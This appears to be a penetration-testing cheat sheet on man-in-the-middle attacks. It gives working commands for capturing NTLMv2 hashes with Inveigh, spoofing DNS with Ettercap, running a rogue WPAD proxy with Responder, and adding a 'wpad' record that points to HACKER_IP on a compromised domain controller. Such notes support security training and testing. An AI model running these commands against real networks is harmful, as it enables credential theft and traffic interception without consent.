Man-in-the-middle attack
A Man-in-the-middle (M-I-T-M) design an attack where an attacker seats between clients and their target server.
- They fooled the client and made them believe they are the 'server'
- They are able to access and maybe edit/drop every message
The hacker will most likely be able to read hashes or credentials sent over the network allowing them to compromise more accounts π.
See also: LLMNR/NBT-NS Poisoning.
Common tools
Inveigh
Inveigh (2.5k β) is a M-I-T-M tool on Windows.
The PS1 script is deprecated:
PS> Import-Module .\Inveigh.ps1
PS> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
You can use the executable if you have admin privileges:
$ wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.10/Inveigh-net7.0-win-x64-trimmed-single-v2.0.10.zip -O Inveigh.zip
$ unzip Inveigh.zip
PS> .\Inveigh.exe
...
HELP<cr>
PROMPT> GET NTLMV2UNIQUE
PROMPT> GET NTLMV2USERNAMES
Ettercap
Ettercap (2.3k β) is a M-I-T-M tool.
$ cat /etc/ettercap/etter.dns
example.com A X.X.X.X
*.example.com A X.X.X.X
- Navigate to
Hosts > Scan for Hosts - Edit the host configuration
- Navigate to
Plugins > Manage Plugins - Active to a
dns_spoofattack.
WPAD rogue proxy server
The Web Proxy Auto-Discovery (WPAD) Protocol is used by web browsers to automatically find the web proxy on the network.
Clients will send a WPAD query to look for the proxy server. The server responds with the URL to the proxy configuration file (wpad.dat).
Hackers can set up a rogue WPAD proxy server and intercept network traffic of the hosts that got fooled. WPAD is not enabled by default in most web browsers aside from Internet Explorer.
We can use responder:
$ sudo responder -I tun0 -wdF -b
We can edit the configuration of a compromised host:
PS> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.example.com
PS> Add-DnsServerResourceRecordA -Name wpad -ZoneName example.com -ComputerName dc01.example.com -IPv4Address HACKER_IP